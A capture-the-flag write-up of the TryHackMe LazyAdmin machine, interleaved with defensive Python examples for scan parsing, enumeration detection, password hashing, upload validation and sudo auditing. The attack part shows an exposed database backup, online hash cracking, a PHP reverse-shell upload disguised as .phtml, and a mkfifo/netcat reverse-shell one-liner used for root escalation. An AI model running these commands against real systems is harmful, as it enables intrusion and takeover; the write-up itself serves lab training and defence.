TryHackMe: LazyAdmin Write-up

Today we are back with a new post, this time solving the LazyAdmin machine on THM.
This is an easy-level machine, so let's connect to the THM OpenVPN network and start hacking!

Task 1 – Lazy Admin

Let's start by gathering some information about the target.
I'll begin with a ping to check connectivity and to get a first hint of which kind of machine it is.

ping -c 1 <machine_ip>

And you can see that there is a connection and that it is a Linux machine (the TTL in the reply is the usual hint).
Let's scan the target with the nmap tool.

Nmap Scan:

We will use the T1595: Active Scanning (MITRE ATT&CK) technique to gather information that can be useful to us.

nmap -vvv -Pn -sCV -p0-65535 --reason -oN lazyadmin.nmap <machine_ip>

22/tcp ssh – OpenSSH 7.2p2, 80/tcp http – Apache 2.4.18
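The scan above writes its normal-format output to lazyadmin.nmap. As an added example (not part of the original write-up), here is a small parser for that format together with a baseline check a defender would run over their own scans: any port reported open that is not in the expected set gets reported. The sample output, the IP 10.10.10.10 and the exact banners are constructed placeholders modelled on the write-up's results, and the REASON column only appears when nmap is run with --reason as in the command above.

```python
import re

# Constructed sample of nmap "normal" output (-oN) with --reason, modelled on the
# scan from the write-up. The IP and exact banners are placeholders, not real scan data.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated as: nmap -vvv -Pn -sCV -p0-65535 --reason -oN lazyadmin.nmap 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up, received user-set (0.045s latency).
Not shown: 65534 closed ports
Reason: 65534 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 (protocol 2.0)
| ssh-hostkey:
|_  2048 placeholder (RSA)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux
# Nmap done -- 1 IP address (1 host up) scanned in 120.00 seconds
"""

# One port line: "PORT/PROTO STATE SERVICE [REASON [ttl N]] [VERSION]".
# The REASON column is only present when nmap is run with --reason.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<reason>(?:syn-ack|conn-refused|reset|no-response|udp-response|port-unreach)"
    r"(?: ttl \d+)?))?"
    r"(?:\s+(?P<version>\S.*?))?\s*$"
)


def parse_nmap_normal(text):
    """Return a list of dicts, one per port line, from nmap -oN output."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue  # headers, script output (|, |_) and comments are skipped
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        rec["version"] = rec["version"] or ""
        records.append(rec)
    return records


def unexpected_open_ports(records, expected_ports):
    """Ports reported open that are not in the defender's expected baseline."""
    return sorted(
        r["port"] for r in records
        if r["state"] == "open" and r["port"] not in expected_ports
    )


if __name__ == "__main__":
    recs = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    for r in recs:
        print(f'{r["port"]}/{r["proto"]} {r["state"]} {r["service"]} {r["version"]}')
    print("unexpected:", unexpected_open_ports(recs, {22}))
```

Feeding the real lazyadmin.nmap file to parse_nmap_normal works the same way; the point of unexpected_open_ports is that an exposed service you did not plan for (here, a CMS on port 80) is the finding, not the scan itself.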

You can see that there are 2 open ports.
Let's try opening the address in the web browser.

http://<machine_ip>

It looks like there is nothing on the site.
Let’s see if we can find something with the gobuster tool.

Gobuster:

We will use the T1083: File and Directory Discovery (MITRE ATT&CK) technique to find directories on the web server using the GoBuster tool.

gobuster dir -u http://<machine_ip> -w <wordlist_file>

You can see that there is an interesting folder worth checking out.
Navigate to the interesting directory in the URL http://<machine_ip>/content/

http://<machine_ip>/content/
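Directory brute forcing like the gobuster run above is very noisy on the server side: one client produces a burst of requests for paths that do not exist. As an added example (not part of the original write-up), here is detection logic a defender can run over Apache access logs. It flags a client on the 404 rate alone, and additionally when the User-Agent names a known scanner, so renaming the tool's User-Agent does not defeat it. The log lines, IPs and timestamps are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed Apache "combined" log lines: one client enumerating paths,
# one ordinary visitor. IPs and timestamps are made up for the example.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 11321 "-" "gobuster/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:02 +0000] "GET /cgi-bin/ HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:02 +0000] "GET /images HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:02 +0000] "GET /uploads HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:03 +0000] "GET /config HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.7 - - [10/Jan/2024:12:05:10 +0000] "GET /content/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2024:12:05:11 +0000] "GET /content/favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2024:12:05:12 +0000] "GET /content/_themes/default/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Tools that identify themselves unless the operator changes the User-Agent.
SCANNER_UA = re.compile(r"gobuster|dirb|dirbuster|ffuf|nikto|wfuzz", re.I)


def parse_line(line):
    """Parse one combined-format access log line into a dict (None if unparsable)."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_enumeration(lines, min_404=5, min_ratio=0.8):
    """Return {ip: [reasons]} for clients whose traffic looks like path enumeration."""
    stats = defaultdict(lambda: {"total": 0, "not_found": 0, "paths": set(), "ua": set()})
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        s = stats[rec["ip"]]
        s["total"] += 1
        if rec["status"] == "404":
            s["not_found"] += 1
            s["paths"].add(rec["path"])
        if rec["ua"]:
            s["ua"].add(rec["ua"])

    flagged = {}
    for ip, s in stats.items():
        reasons = []
        # Primary signal: many distinct missing paths and a high 404 share.
        if s["not_found"] >= min_404 and s["not_found"] / s["total"] >= min_ratio:
            reasons.append(f'{s["not_found"]} of {s["total"]} requests returned 404')
        # Secondary signal: a scanner that announces itself.
        if any(SCANNER_UA.search(ua) for ua in s["ua"]):
            reasons.append("scanner User-Agent")
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, why in detect_enumeration(SAMPLE_ACCESS_LOG.splitlines()).items():
        print(ip, "->", "; ".join(why))
```

The thresholds are deliberately simple; in production you would evaluate them per time window rather than over a whole file, but the shape of the signal (one source, many 404s for distinct paths) is the same. The real mitigation for what follows in this write-up is not detection but not leaving a database backup inside the web root in the first place.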

We got the web page of SweetRice, a CMS for managing websites.
Let's run gobuster on this directory too and see if there is anything interesting.

/inc, /as, /_themes, /attachment

You can see some interesting directories here.
Let's access each of them and look around.

http://<machine_ip>/content/inc/mysql_backup/

And we seem to have found something quite interesting.
Let's download this SQL file by clicking on it.
Now let's read the file carefully with the less command and see if there is anything interesting in it.

less <mysql_file>

As you can see, we found some interesting things: manager, admin, passwd and a hash.
Let's use the T1110.002: Brute Force: Password Cracking (MITRE ATT&CK) technique with the online hash-cracking tool CrackStation.

https://crackstation.net/

As you can see, the password for admin or manager is ***********.
The other interesting directory we found earlier is /as.
Let's go to that address and try to log in with the username admin or manager and the password we found.
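The reason an online lookup service can return the password for a hash copied out of a backup file is that an unsalted, fast hash is deterministic: the same password always produces the same hash, so one precomputed table serves every site. As an added example (not part of the original write-up or of SweetRice), the block below contrasts unsalted MD5 with salted PBKDF2-HMAC-SHA256 from Python's standard library, which is what a CMS should store instead. The password "password" is a constructed example value.

```python
import hashlib
import hmac
import os


def md5_hex(password):
    """Unsalted MD5: the kind of hash a lookup table reverses instantly."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256; returns a self-describing string for storage.
    A fresh random salt per user makes precomputed tables useless, and the
    iteration count makes each guess expensive."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def same_password_same_hash(hasher, password):
    """True if hashing the same password twice gives identical output,
    i.e. the scheme is lookup-table friendly."""
    return hasher(password) == hasher(password)


if __name__ == "__main__":
    print("md5   :", md5_hex("password"), "(repeatable:", same_password_same_hash(md5_hex, "password"), ")")
    stored = hash_password("password")
    print("pbkdf2:", stored[:60] + "...", "(repeatable:", same_password_same_hash(hash_password, "password"), ")")
    print("verify correct:", verify_password("password", stored))
    print("verify wrong  :", verify_password("Password", stored))
```

Even with a proper hash, a leaked backup still exposes the usernames and lets an attacker guess offline, so the salted hash is a second line of defence behind not exposing the backup at all.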

http://<machine_ip>/content/as/

The connection seems to have worked.

Yay!!

Now we need to see if there is anything that can be exploited.
From what I have seen, we can upload a file in the Data section.

Data Import

Thinking what I'm thinking? Upload a PHP file that contains a reverse shell.
I usually use the pentestmonkey script to get a reverse shell with netcat.

Git clone the script in the terminal:
git clone https://github.com/pentestmonkey/php-reverse-shell.git

Change directory into the php-reverse-shell folder and make the php-reverse-shell script executable with the chmod +x command.

Open the PHP reverse shell script in an editor and change the $ip and $port variables to your host machine's IP and the port you want to listen on.

Now you have configured the script. We will proceed further and upload the file.

When you try to upload the script, nothing is uploaded,
probably because .php files are not allowed.

php-revere-shell.php

From my experience you can try uploading a .phtml file instead, and it will most likely go through. If you want, you can also try the T1110: Brute Force (MITRE ATT&CK) technique with the Burp Suite tool, as I explained in my previous write-up for the RootMe machine.

As you can see, the file was uploaded successfully.
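The upload check failed here because it was a blacklist: it knew about .php but not about the other extensions that Apache's PHP module on Debian/Ubuntu maps to the PHP handler (.phtml, .pht, .php5 and so on). As an added example (not part of SweetRice or the original write-up), here is the weak check beside the one an upload feature should use: an allowlist of expected data types, a rejection of any PHP-like segment anywhere in the name (so double extensions do not slip through), and a server-generated storage name so the client's filename is never reused. The extension sets are illustrative.

```python
import os
import re
import secrets

# The kind of check that let .phtml through: it only knows one bad extension.
BLOCKED_EXTENSIONS = {".php"}

# What this hypothetical import feature actually needs to accept.
ALLOWED_EXTENSIONS = {".csv", ".txt", ".jpg", ".png"}

# Extensions a typical Apache PHP handler configuration treats as PHP.
PHP_LIKE = re.compile(r"^\.ph(p\d?|t|tml|ar)$", re.I)


def blacklist_allows(filename):
    """Weak check: rejects only the extensions it has heard of."""
    return os.path.splitext(filename)[1].lower() not in BLOCKED_EXTENSIONS


def allowlist_allows(filename):
    """Strong check: the last extension must be on the allowlist and no
    segment of the name may look like a PHP extension."""
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False  # no extension, or a dotfile such as .htaccess
    exts = ["." + p for p in parts[1:]]
    if any(PHP_LIKE.match(e) for e in exts):
        return False  # catches shell.phtml and shell.php.txt alike
    return exts[-1] in ALLOWED_EXTENSIONS


def safe_stored_name(filename):
    """Name to store the file under: random token plus the validated extension.
    Store it outside the web root so nothing uploaded is ever executed."""
    if not allowlist_allows(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name in ["data.csv", "shell.php", "shell.phtml", "shell.php.txt", ".htaccess"]:
        print(f"{name:15} blacklist={blacklist_allows(name)!s:5} allowlist={allowlist_allows(name)}")
```

Extension checks only decide the name; the same feature should also verify the content matches the declared type and should serve stored files with a handler that never executes them.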

Let’s go back to where we found the mysql backup file.

http://<machine_ip>/content/inc/mysql_backup/

Now we need to start a netcat listener. I am using port 1234, and I have already put the same port and my machine's IP in the script that we edited and uploaded.

netcat:

nc -nlvp 1234

Now we have to get a shell by executing the uploaded script in the http://<machine_ip>/content/inc/mysql_backup/ directory that we found earlier (see above).

Just click on the php-revere-shell.phtml file and check back on your netcat listener.

shell

You can see we got a shell, but it is not a proper interactive one.

So we’re going to upgrade our shell via python.

Python:

We can check whether python is present with the which command.
After confirming that we have python, it's time to upgrade our shell.

python -c 'import pty;pty.spawn("/bin/bash")'

You can see we were able to upgrade our shell.
Now let's search for the user.txt file with the find command.

find / -iname user.txt -exec wc {} \;

You can see that one result stands out from the others.

Let’s navigate to that folder and try to read the user.txt file using the cat command.

THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}

#1.1 What is the user flag?
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}

Now for root we need to escalate privileges, so let's try the sudo -l command.

sudo -l

You can see something quite interesting: there is a Perl script that can be run as root.

But it doesn't look like we have write permission to it.
However, reading the script shows that it runs another file which we do have write permission to.
All we have to do is put a reverse shell into that file and listen with netcat.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.x.x.x 4555 >/tmp/f" > copy.sh

Now we need to start a netcat listener; I am using port 4555.

nc -nlvp 4555

Now run the perl script we found earlier.

sudo perl /home/itguy/backup.pl

Now go back to the listener and take a look at this amazing thing.

root
Good job!
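The root cause of this escalation is a sudo rule that lets a user run a root-owned script which in turn executes a file anyone can edit; the sudo rule and the script are both read-only, but the trust chain is only as strong as its most writable link. As an added example (not part of the original write-up), here is a small audit helper a system owner can run against every script granted through sudoers: it checks that the target and every existing file it references are not world-writable. The demo recreates the shape of backup.pl and copy.sh in a temporary directory with constructed contents; the path regex is a deliberate simplification that only catches absolute paths written literally in the script.

```python
import os
import re
import stat
import tempfile

# Absolute paths written literally in a script (good enough for shell/perl system() calls).
ABS_PATH = re.compile(r"(?<![\w.-])/(?:[\w.-]+/)*[\w.-]+")


def others_writable(path):
    """True if the file's mode grants write permission to 'other' (follows symlinks)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_sudo_target(script_path):
    """Audit a script that sudoers allows to run as root: the script itself and
    every existing file it references must not be writable by arbitrary users.
    Returns a list of (path, reason) findings; an empty list means clean."""
    findings = []
    if others_writable(script_path):
        findings.append((script_path, "sudo target is world-writable"))
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    for ref in sorted(set(ABS_PATH.findall(text))):
        if ref == script_path or not os.path.isfile(ref):
            continue  # interpreter paths that exist and are root-owned pass silently
        if others_writable(ref):
            findings.append((ref, "referenced file is world-writable"))
    return findings


def demo():
    """Recreate the write-up's situation in a temp dir (constructed, not the real box):
    a root-run backup.pl that executes a helper script anyone can edit."""
    d = tempfile.mkdtemp()
    helper = os.path.join(d, "copy.sh")
    script = os.path.join(d, "backup.pl")
    with open(helper, "w") as fh:
        fh.write("#!/bin/sh\necho backup done\n")
    os.chmod(helper, 0o777)  # the misconfiguration: world-writable helper
    with open(script, "w") as fh:
        fh.write(f'#!/usr/bin/perl\nsystem("sh", "{helper}");\n')
    os.chmod(script, 0o755)  # the script itself is not writable by others
    return audit_sudo_target(script)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"FINDING: {path}: {reason}")
```

The fix on a real host is the obvious one: helper scripts invoked by anything run through sudo belong to root with mode 0755 or tighter, and the sudo rule should name the narrowest command that does the job.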

#1.1 What is the root flag?
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}

Hope you enjoyed, I really enjoyed.
Feel free to comment.

-Chai Geydarov
